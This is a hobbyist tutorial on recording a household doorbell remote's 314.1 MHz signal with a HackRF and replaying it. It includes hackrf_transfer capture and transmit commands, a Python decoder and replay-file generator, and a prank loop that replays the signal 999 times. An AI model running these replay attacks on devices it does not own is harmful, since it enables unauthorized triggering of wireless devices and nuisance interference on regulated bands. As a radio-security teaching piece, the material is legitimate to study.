0×00 Preface
In the first article, 永不消逝的電波(一):無線電入門篇 (The Never-Fading Radio Wave, part 1: a radio primer), we went through the history of radio and some of its physics. In this second part we use a HackRF to record the wireless signal of a household doorbell remote and then replay it, which works because the doorbell accepts the same fixed transmission every time (no rolling code or challenge), so the raw captured samples are all an attacker needs.
The doorbell was bought on Taobao (某寶):
0×01 Environment setup:
On macOS you can use gqrx and the hackrf tools (Xcode and MacPorts are required):
sudo port install gnuradio
sudo port install hackrf
sudo port install rtl-sdr
sudo port install gr-osmosdr
sudo port install gqrx
See also: Installing the HackRF environment on a Mac (在Mac上安裝HackRF環境)
0×02 Getting to the point:
After installation, plug in the HackRF and run hackrf_info in the terminal:
hackrf_info
Found HackRF board.
Board ID Number: 2 (HackRF One)
Firmware Version: git-815d1f6
Part ID Number: 0xa000cb3c 0x00664f49
Serial Number: 0x00000000 0x00000000 0x583064c0 0x2640ad4b
# launch gqrx from the terminal
gqrx
Press the remote and gqrx shows the signal's peak at about 314.100000 MHz (read: 314.1 megahertz):
1 MHz = 1,000,000 Hz; 1 kHz = 1,000 Hz; 314.1 MHz = 314,100,000 Hz
Close gqrx (only one process can hold the HackRF at a time) and use hackrf_transfer instead:
hackrf_transfer
Usage:
	-r <filename> # Receive data into file.   (save the received samples to a file: signal recording)
	-t <filename> # Transmit data from file.  (read samples from a file and transmit them: signal playback)
	-w # Receive data into file with WAV header and automatic name.
	   # This is for SDR# compatibility and may not work with other software.
	[-f freq_hz] # Frequency in Hz [0MHz to 7250MHz].
	[-i if_freq_hz] # Intermediate Frequency (IF) in Hz [2150MHz to 2750MHz].
	[-o lo_freq_hz] # Front-end Local Oscillator (LO) frequency in Hz [84MHz to 5400MHz].
	[-m image_reject] # Image rejection filter selection, 0=bypass, 1=low pass, 2=high pass.
	[-a amp_enable] # RX/TX RF amplifier 1=Enable, 0=Disable.
	[-p antenna_enable] # Antenna port power, 1=Enable, 0=Disable.
	[-l gain_db] # RX LNA (IF) gain, 0-40dB, 8dB steps
	[-g gain_db] # RX VGA (baseband) gain, 0-62dB, 2dB steps
	[-x gain_db] # TX VGA (IF) gain, 0-47dB, 1dB steps
	[-s sample_rate_hz] # Sample rate in Hz (8/10/12.5/16/20MHz, default 10MHz).
	[-n num_samples] # Number of samples to transfer (default is unlimited).
	[-c amplitude] # CW signal source mode, amplitude 0-127 (DC value to DAC).
	[-b baseband_filter_bw_hz] # Set baseband filter bandwidth in MHz.
		Possible values: 1.75/2.5/3.5/5/5.5/6/7/8/9/10/12/14/15/20/24/28MHz, default < sample_rate_hz.
hackrf_transfer -r /dev/stdout -f 314100000 -a 1 -g 16 -l 32 -s 8000000
Without pressing the remote:
Pressing the remote:
hackrf_transfer has no demodulation or decoding option: what it writes is the raw sample stream, one signed 8-bit I value and one signed 8-bit Q value per sample, so sending that to the terminal just prints a pile of binary garbage.
0×03 Recording the signal & signal analysis
Record the remote's wireless signal:
hackrf_transfer -r door.raw -f 314100000 -g 16 -l 32 -a 1 -s 8000000 -b 4000000
Terminal output:
hackrf_transfer -r door.raw -f 314100000 -g 16 -l 32 -a 1 -s 8000000 -b 4000000
call hackrf_sample_rate_set(8000000 Hz/8.000 MHz)
call hackrf_baseband_filter_bandwidth_set(3500000 Hz/3.500 MHz)
call hackrf_set_freq(314100000 Hz/314.100 MHz)
call hackrf_set_amp_enable(1)
Stop with Ctrl-C
16.0 MiB / 1.005 sec = 15.9 MiB/second
16.0 MiB / 1.003 sec = 15.9 MiB/second
16.0 MiB / 1.004 sec = 15.9 MiB/second
16.3 MiB / 1.004 sec = 16.2 MiB/second
16.0 MiB / 1.002 sec = 16.0 MiB/second
16.0 MiB / 1.001 sec = 16.0 MiB/second
16.0 MiB / 1.004 sec = 15.9 MiB/second
16.0 MiB / 1.003 sec = 15.9 MiB/second
16.3 MiB / 1.003 sec = 16.2 MiB/second
16.0 MiB / 1.003 sec = 15.9 MiB/second
16.0 MiB / 1.005 sec = 15.9 MiB/second
^CCaught signal 2
 8.1 MiB / 0.510 sec = 15.9 MiB/second
User cancel, exiting...
Total time: 11.54724 s
hackrf_stop_rx() done
hackrf_close() done
hackrf_exit() done
fclose(fd) done
exit
Two things worth reading off this output: 4 MHz is not one of the supported baseband filter widths, so the library rounded -b 4000000 down to 3.5 MHz; and 8 MS/s of 8-bit I/Q is 2 bytes per sample, about 16 MB/s, which is why 12 seconds of capture produces a file close to 190 MB.
Waveform analysis:
The tool used here is Audacity. Import the recording as raw data (File → Import → Raw Data), since the file is uncompressed, unprocessed samples with no header.
The following dialog appears:
The default parameters were used and the file imported directly. Strictly, door.raw is interleaved signed 8-bit I/Q, so the faithful settings are Signed 8-bit PCM, 2 channels, 8000000 Hz; the on/off bursts are what matters for the next steps either way.
The section in the middle is the wireless signal recorded while the remote was pressed. Zoom in on it with Audacity's magnifier:
Zooming in further:
Zooming in again:
And once more:
At this point readers with some experience can turn the RF waveform into bits by reading the pulse widths: 01010101**** . Those bits can then be written into a GRC (GNU Radio Companion) flowgraph and the flowgraph used to replay the signal. The rough method is as follows:
Launch GNU Radio Companion: Kali Linux → Wireless Attacks → Software Defined Radio → GnuRadio-Companion
Source: find Vector Source under the Misc column on the right
Use the search box to add Repeat (old), Moving Average and osmocom Sink
The four blocks:
Wire them up in that order:
I haven't used GRC much and am not yet comfortable with it; I'll try this method another time :)
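The two manual steps above (reading bits off the Audacity zoom, then feeding them into a Vector Source → Repeat → osmocom Sink flowgraph) can be done in one script. The following Python is an added example written for this page; it is not code from the article, and the doorbell's real encoding is not given there. It parses the headerless interleaved int8 I/Q that hackrf_transfer -r writes, envelope-detects the on/off keyed burst, slices the pulse widths into a bit string, and regenerates a clean frame from a bit string as an int8 I/Q file that hackrf_transfer -t can play. The pulse timing (500 µs short pulse, 1:3 pulse-width modulation, a short sync pulse followed by a 31-unit gap) and the mapping short high = 0 / long high = 1 are assumptions modelled on common PT2262/EV1527-style fixed-code remotes; the demo input is constructed inside the script, not captured from the doorbell.

```python
"""Decode an OOK remote burst from a HackRF raw capture and regenerate it.

hackrf_transfer -r writes headerless interleaved signed 8-bit I/Q samples
(I0 Q0 I1 Q1 ...). The remote keys its carrier on and off, so the magnitude
sqrt(I^2 + Q^2) recovers the pulse train wherever the carrier sits inside the
capture bandwidth. ASSUMED encoding: short high = '0', long high = '1' (1:3
widths), sync = short high then a long gap; the article never names the chip.
"""
from array import array
import math
import random
import sys


def magnitudes(raw: bytes) -> list:
    """Interleaved int8 I/Q bytes -> per-sample magnitude."""
    iq = array("b")
    iq.frombytes(raw)
    return [math.hypot(iq[k], iq[k + 1]) for k in range(0, len(iq) - 1, 2)]


def envelope(mag: list, window: int) -> list:
    """Moving average over `window` samples (what GRC's Moving Average does)."""
    out, acc = [], 0.0
    for k, v in enumerate(mag):
        acc += v
        if k >= window:
            acc -= mag[k - window]
        out.append(acc / min(k + 1, window))
    return out


def runs(env: list, thresh: float, min_len: int) -> list:
    """Threshold -> [(is_high, length)]; runs shorter than min_len are
    glitches and are absorbed into the run before them."""
    out = []
    for v in env:
        hi = v > thresh
        if out and out[-1][0] == hi:
            out[-1][1] += 1
        else:
            out.append([hi, 1])
    merged = []
    for hi, n in out:
        if merged and (n < min_len or merged[-1][0] == hi):
            merged[-1][1] += n
        else:
            merged.append([hi, n])
    return [tuple(r) for r in merged]


def frames(run_list: list, short: int, gap_factor: int = 8) -> list:
    """Group high-pulse widths into frames, splitting at gaps >> `short`."""
    out, cur = [], []
    for hi, n in run_list:
        if hi:
            cur.append(n)
        elif n > gap_factor * short and cur:
            out.append(cur)
            cur = []
    if cur:
        out.append(cur)
    return out


def slice_bits(high_widths: list, short: int) -> str:
    """A high pulse wider than 2*short is the long (3x) pulse -> '1'."""
    return "".join("1" if w > 2 * short else "0" for w in high_widths)


def decode_capture(raw: bytes, sample_rate: int, min_bits: int = 8) -> list:
    """Bit string of every frame in a capture; lone sync pulses are dropped
    because a frame with fewer than min_bits pulses is ignored."""
    window = max(4, int(sample_rate * 20e-6))          # ~20 us of smoothing
    env = envelope(magnitudes(raw), window)
    rl = runs(env, (min(env) + max(env)) / 2, window)
    highs = [n for hi, n in rl if hi]
    if not highs:
        return []
    short = min(highs)                                  # sync / '0' pulse width
    return [slice_bits(f, short) for f in frames(rl, short) if len(f) >= min_bits]


def encode_frame(bits: str, sample_rate: int, short_us: int = 500,
                 offset_hz: int = 50_000, noise: float = 0.0) -> bytes:
    """One sync+bits frame as int8 I/Q (the format hackrf_transfer -t reads).
    The tone sits offset_hz above the tuned frequency so the carrier avoids the
    DC/LO-leakage spike at the HackRF centre: tune with -f (target - offset).
    `noise` only exists to make the constructed test input realistic."""
    rng = random.Random(1)
    short = int(sample_rate * short_us / 1_000_000)
    gate = [0] * (4 * short) + [1] * short + [0] * (31 * short)   # silence, sync
    for b in bits:
        hi, lo = (3 * short, short) if b == "1" else (short, 3 * short)
        gate += [1] * hi + [0] * lo
    gate += [0] * (8 * short)                                     # trailing gap
    iq = array("b")
    for n, g in enumerate(gate):
        ph = 2 * math.pi * offset_hz * n / sample_rate
        iq.append(int(100 * g * math.cos(ph) + rng.uniform(-noise, noise)))
        iq.append(int(100 * g * math.sin(ph) + rng.uniform(-noise, noise)))
    return iq.tobytes()


def write_replay_file(path: str, bits: str, sample_rate: int = 8_000_000,
                      repeats: int = 5) -> int:
    """Write `repeats` frames for `hackrf_transfer -t path -s sample_rate`."""
    frame = encode_frame(bits, sample_rate)
    with open(path, "wb") as f:
        for _ in range(repeats):
            f.write(frame)
    return repeats * len(frame)


if __name__ == "__main__":
    if len(sys.argv) == 3:                  # python3 ook.py door.raw 8000000
        with open(sys.argv[1], "rb") as f:
            print(decode_capture(f.read(), int(sys.argv[2])))
    else:                                   # constructed round-trip demo
        demo = encode_frame("101100111000", 250_000, noise=4.0)
        print(decode_capture(demo, 250_000, min_bits=4))
```

Run it as `python3 ook.py door.raw 8000000` to decode a real capture (pure Python is slow on a 190 MB file; trim the file to the burst first, or replace the lists with numpy arrays), or with no arguments for the constructed round trip. A file from write_replay_file plays back with `hackrf_transfer -t replay.raw -f <target minus 50000> -s 8000000 -x 47 -a 1`; running the file through decode_capture before transmitting is a cheap check that the bits in the file are the ones you meant to send.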
0×04 Signal replay
Replay the signal with hackrf_transfer. -x sets the TX VGA gain (47 dB is the maximum) and -a 1 enables the RF amplifier, so this is full power; transmitting on 314 MHz is regulated, so do this only against your own doorbell, at the lowest gain that works, or into an attenuator:
hackrf_transfer -t door.raw -f 314100000 -x 47 -a 1 -s 8000000 -b 4000000
Terminal output (the run echoed here was started with the receive-only gain flags -g/-l rather than -x 47; they have no effect in transmit mode, which leaves the TX VGA gain at its default):
hackrf_transfer -t door.raw -f 314100000 -g 16 -l 32 -a 1 -s 8000000 -b 4000000
call hackrf_sample_rate_set(8000000 Hz/8.000 MHz)
call hackrf_baseband_filter_bandwidth_set(3500000 Hz/3.500 MHz)
call hackrf_set_freq(314100000 Hz/314.100 MHz)
call hackrf_set_amp_enable(1)
Stop with Ctrl-C
16.0 MiB / 1.004 sec = 15.9 MiB/second
16.0 MiB / 1.004 sec = 15.9 MiB/second
16.0 MiB / 1.003 sec = 15.9 MiB/second
16.0 MiB / 1.001 sec = 16.0 MiB/second
16.0 MiB / 1.000 sec = 16.0 MiB/second
16.3 MiB / 1.001 sec = 16.2 MiB/second
16.0 MiB / 1.003 sec = 16.0 MiB/second
16.0 MiB / 1.001 sec = 16.0 MiB/second
16.0 MiB / 1.005 sec = 15.9 MiB/second
16.0 MiB / 1.003 sec = 15.9 MiB/second
16.3 MiB / 1.003 sec = 16.2 MiB/second
 8.4 MiB / 1.004 sec = 8.4 MiB/second
Exiting... hackrf_is_streaming() result: HACKRF_ERROR_STREAMING_EXIT_CALLED (-1004)
Total time: 12.03184 s
hackrf_stop_tx() done
hackrf_close() done
hackrf_exit() done
fclose(fd) done
exit
The HACKRF_ERROR_STREAMING_EXIT_CALLED line is normal: it is how hackrf_transfer reports that it reached the end of the file and stopped transmitting.
0×05 Demo video
The proper way for a naughty kid (熊孩子) to use it looks like this (note the loop again uses the receive-only -g/-l flags; add -x for the TX gain):
for i in {1..999}; do hackrf_transfer -t door.raw -f 314100000 -g 16 -l 32 -a 1 -s 8000000 -b 4000000; done
Yes, you read that right: replay it nine hundred and ninety-nine times :)
0×06 References:
Hacking fixed key remotes
Exploring Bluetooth & iBeacons – from software to radio signals and back.
Chinese version: HackRF嗅探藍芽重放iBeacons訊號 (Sniffing Bluetooth and replaying iBeacon signals with HackRF)
GNU_Radio入門_V0.99 (GNU Radio primer, v0.99)
永不消逝的電波(二)HackRF入門:家用無線門鈴訊號重放 (The Never-Fading Radio Wave, part 2, HackRF primer: replaying a household wireless doorbell signal)